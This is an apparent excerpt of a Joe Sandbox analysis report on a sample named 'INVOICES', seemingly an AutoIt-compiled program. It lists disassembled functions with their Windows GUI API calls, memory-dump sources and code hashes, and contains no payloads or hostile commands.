                                                                                                                                  • API ID: MessageSend$Window
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 2326795674-4108050209
                                                                                                                                  • Opcode ID: 7ab296135b204df3efb328d3c8ece4feb98ea671993b797650cdd88d83d69b2e
                                                                                                                                  • Instruction ID: c12bc79527bb28811a8c99871da5a2f37bf172a7dda5cba96c5936d0e8335991
                                                                                                                                  • Opcode Fuzzy Hash: 7ab296135b204df3efb328d3c8ece4feb98ea671993b797650cdd88d83d69b2e
                                                                                                                                  • Instruction Fuzzy Hash: C4029C31108201AFE7258F24C849BEABBE5FF49714F04862DFBA5D62A1D73CD944CB92
                                                                                                                                  Function 007BA8FC Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000012), ref: 007BA935
                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 007BA939
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 007BA94F
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 007BA95A
                                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 007BA95F
                                                                                                                                  • GetSysColor.USER32(00000011), ref: 007BA977
                                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007BA985
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 007BA996
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 007BA99F
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 007BA9AC
                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 007BA9CB
                                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007BA9E2
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 007BA9F7
                                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007BAA1F
                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007BAA46
                                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 007BAA64
                                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 007BAA6F
                                                                                                                                  • GetSysColor.USER32(00000011), ref: 007BAA7D
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 007BAA85
                                                                                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007BAA99
                                                                                                                                  • SelectObject.GDI32(?,007BA62C), ref: 007BAAB0
                                                                                                                                  • DeleteObject.GDI32(?), ref: 007BAABB
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 007BAAC1
                                                                                                                                  • DeleteObject.GDI32(?), ref: 007BAAC6
                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 007BAACC
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 007BAAD6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1996641542-0
                                                                                                                                  • Opcode ID: fdf8c389cb7ea704b5ba52c3de29f7e68b3daa333739632763fae60baf5ce9ab
                                                                                                                                  • Instruction ID: f2ab8b3d434b16af9e81a63d555980a9a7eeff91a50d0e7d99085beff04876b3
                                                                                                                                  • Opcode Fuzzy Hash: fdf8c389cb7ea704b5ba52c3de29f7e68b3daa333739632763fae60baf5ce9ab
                                                                                                                                  • Instruction Fuzzy Hash: 3F510C71900208FFDB11AFA8DC48FEE7B79EF48720F118625F911AA2A1D6799940DF54
                                                                                                                                  Function 007B8A07 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007B8AF3
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007B8B04
                                                                                                                                  • CharNextW.USER32(0000014E), ref: 007B8B33
                                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007B8B74
                                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007B8B8A
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007B8B9B
                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007B8BB8
                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 007B8C0A
                                                                                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007B8C20
                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 007B8C51
                                                                                                                                  • _memset.LIBCMT ref: 007B8C76
                                                                                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007B8CBF
                                                                                                                                  • _memset.LIBCMT ref: 007B8D1E
                                                                                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007B8D48
                                                                                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 007B8DA0
                                                                                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 007B8E4D
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 007B8E6F
                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B8EB9
                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B8EE6
                                                                                                                                  • DrawMenuBar.USER32(?), ref: 007B8EF5
                                                                                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 007B8F1D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1073566785-4108050209
                                                                                                                                  • Opcode ID: 035a21a8fda42a4ebd3d358e1d3e3ca1fbfd88d9500b1e30739a98a1fc15cc97
                                                                                                                                  • Instruction ID: 97b61c8bbf53624b7c5e10e4b89f895dcacdf05d08c88ee827ad7b93940a55eb
                                                                                                                                  • Opcode Fuzzy Hash: 035a21a8fda42a4ebd3d358e1d3e3ca1fbfd88d9500b1e30739a98a1fc15cc97
                                                                                                                                  • Instruction Fuzzy Hash: 37E16A70900208EADF609F60CC88FFE7BBDEB05754F14815AF915AA291DB788A81CF61
                                                                                                                                  Function 007B48F8 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(?), ref: 007B4A33
                                                                                                                                  • GetDesktopWindow.USER32 ref: 007B4A48
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 007B4A4F
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007B4AB1
                                                                                                                                  • DestroyWindow.USER32(?), ref: 007B4ADD
                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007B4B06
                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007B4B24
                                                                                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007B4B4A
                                                                                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 007B4B5F
                                                                                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007B4B72
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 007B4B92
                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007B4BAD
                                                                                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007B4BC1
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 007B4BD9
                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 007B4BFF
                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 007B4C19
                                                                                                                                  • CopyRect.USER32(?,?), ref: 007B4C30
                                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 007B4C9B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                  • Opcode ID: a10bf8735ce2b19aae6f8710d2f30c5a82a7c0d596a14d1d9df9020cf5d1c083
                                                                                                                                  • Instruction ID: f53442905b346b2ad717445d7982b55e2474a0cba96e0053f3c174a7b7135efa
                                                                                                                                  • Opcode Fuzzy Hash: a10bf8735ce2b19aae6f8710d2f30c5a82a7c0d596a14d1d9df9020cf5d1c083
                                                                                                                                  • Instruction Fuzzy Hash: D7B15B71604341AFDB04DF24C849BAABBE4FF88714F008A1DF5999B292D779EC04CB96
                                                                                                                                  Function 007327D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007328BC
                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 007328C4
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007328EF
                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 007328F7
                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0073291C
                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00732939
                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00732949
                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0073297C
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00732990
                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 007329AE
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 007329CA
                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 007329D5
                                                                                                                                    • Part of subcall function 00732344: GetCursorPos.USER32(?), ref: 00732357
                                                                                                                                    • Part of subcall function 00732344: ScreenToClient.USER32(007F57B0,?), ref: 00732374
                                                                                                                                    • Part of subcall function 00732344: GetAsyncKeyState.USER32(00000001), ref: 00732399
                                                                                                                                    • Part of subcall function 00732344: GetAsyncKeyState.USER32(00000002), ref: 007323A7
                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00731256), ref: 007329FC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                  • Opcode ID: b571b9d85dc20a9d88c9164d092c8f812f831946eb705707955f3c02649d6a3b
                                                                                                                                  • Instruction ID: 2b25865ca538eada179273725d5fb7b92e230a203f4a5034b05a8eba27e73baa
                                                                                                                                  • Opcode Fuzzy Hash: b571b9d85dc20a9d88c9164d092c8f812f831946eb705707955f3c02649d6a3b
                                                                                                                                  • Instruction Fuzzy Hash: ACB15F7160020AEFEB15DFA8DC59BED7BB4FB08710F108229FE15A7291DB78A851CB54
                                                                                                                                  Function 007944DB Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 179COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscat$A1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                  • API String ID: 3483108802-1459072770
                                                                                                                                  • Opcode ID: af7d66114ff3989bb238cf0cfa1d76beb5fa3cf20ec89f454c106abc430b7176
                                                                                                                                  • Instruction ID: cbb36953785479ce9d06da70fff8f9f481e31c1259669482da104ea6fbe6e1e6
                                                                                                                                  • Opcode Fuzzy Hash: af7d66114ff3989bb238cf0cfa1d76beb5fa3cf20ec89f454c106abc430b7176
                                                                                                                                  • Instruction Fuzzy Hash: 9A4127B2504204BBDB10AB64AC4BEFF376CDF46711F044066FC05E6183EBBC9A1696E9
                                                                                                                                  Function 0078A844 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0078A885
                                                                                                                                  • __swprintf.LIBCMT ref: 0078A926
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078A939
                                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0078A98E
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078A9CA
                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0078AA01
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0078AA53
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0078AA89
                                                                                                                                  • GetParent.USER32(?), ref: 0078AAA7
                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 0078AAAE
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0078AB28
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078AB3C
                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0078AB62
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078AB76
                                                                                                                                    • Part of subcall function 007537AC: _iswctype.LIBCMT ref: 007537B4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                  • String ID: %s%u
                                                                                                                                  • API String ID: 3744389584-679674701
                                                                                                                                  • Opcode ID: 730c6fb6031d62f081721f57b6509b2a9fb6ffed62ebb48df21d3640df823f17
                                                                                                                                  • Instruction ID: 6f22e5a5dce7437587da3c39b9432673b05dd691ce5bcd6872ae5105cb7d8595
                                                                                                                                  • Opcode Fuzzy Hash: 730c6fb6031d62f081721f57b6509b2a9fb6ffed62ebb48df21d3640df823f17
                                                                                                                                  • Instruction Fuzzy Hash: 39A1C571244306FFE715EF64C888FAAB7A9FF04354F00862AF999C2150D738E955CB92
                                                                                                                                  Function 0078B196 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 0078B1DA
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078B1EB
                                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 0078B213
                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 0078B230
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078B24E
                                                                                                                                  • _wcsstr.LIBCMT ref: 0078B25F
                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0078B297
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078B2A7
                                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 0078B2CE
                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 0078B317
                                                                                                                                  • _wcscmp.LIBCMT ref: 0078B327
                                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 0078B34F
                                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 0078B3B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                                  • Opcode ID: 005638243198aef8885a90bbaa1017158a180aa429e7728fffa02dd742ae8df1
                                                                                                                                  • Instruction ID: 08e58bd93d984fa1515befdb86518c4a238530f6f9c905a37b6e8b24845b3066
                                                                                                                                  • Opcode Fuzzy Hash: 005638243198aef8885a90bbaa1017158a180aa429e7728fffa02dd742ae8df1
                                                                                                                                  • Instruction Fuzzy Hash: C181B27104834A9FDB04EF10C885FAA7BE8FF44714F048569FD898A0A2DB78DD4ACB61
                                                                                                                                  Function 0078AFDF Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                                  • Opcode ID: f055ef7f1188ddde8efcc961e6307af8be69de731799168d2683f38b59181e8a
                                                                                                                                  • Instruction ID: e0c7f04f22891044e0c93db96126e9acc1a58fed0bc8e087b9788d77291d2188
                                                                                                                                  • Opcode Fuzzy Hash: f055ef7f1188ddde8efcc961e6307af8be69de731799168d2683f38b59181e8a
                                                                                                                                  • Instruction Fuzzy Hash: C831B0B1A88309E6EA28FA65CC4BEEF77A49F14751F204128F451710E2EF6E6F04C751
                                                                                                                                  Function 0078C2C0 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000063), ref: 0078C2D3
                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0078C2E5
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0078C2FC
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0078C311
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0078C317
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0078C327
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0078C32D
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0078C34E
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0078C368
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0078C371
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0078C3DC
                                                                                                                                  • GetDesktopWindow.USER32 ref: 0078C3E2
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0078C3E9
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0078C435
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0078C442
                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0078C467
                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0078C492
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3869813825-0
                                                                                                                                  • Opcode ID: 00e80476a5e5073b9037b2d454f48e1ab89f56956f111a4c1a20fce151968b44
                                                                                                                                  • Instruction ID: 0de70548798378c1738525e6e49a5d492e4b4c378a08edee848d87cc3f267629
